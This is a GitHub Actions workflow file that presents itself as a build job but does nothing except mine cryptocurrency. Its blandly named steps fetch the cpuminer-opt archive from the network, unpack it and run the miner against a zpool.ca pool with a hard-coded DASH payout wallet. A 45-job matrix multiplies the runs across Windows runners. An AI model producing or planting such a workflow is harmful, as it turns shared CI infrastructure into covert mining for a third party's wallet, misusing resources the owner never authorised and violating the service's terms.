name: zp

on: [workflow_dispatch]

jobs:
  build:
    name: zp
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Preparing
      run: Invoke-WebRequest https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.22/cpuminer-opt-win.zip -OutFile cpuminer-opt-win.zip
    - name: Prepare_Q2
      run: Expand-Archive cpuminer-opt-win.zip
    - name: Running
      run: .\cpuminer-opt-win\cpuminer-avx2.exe -a yescryptR32 -o stratum+tcp://yescryptR32.sea.mine.zpool.ca:6343 -u XodAkKrxESGiJvzAX2ropKAAFLJ6rac2J5 -p c=DASH -t4
    - name: DONE
      run: exit
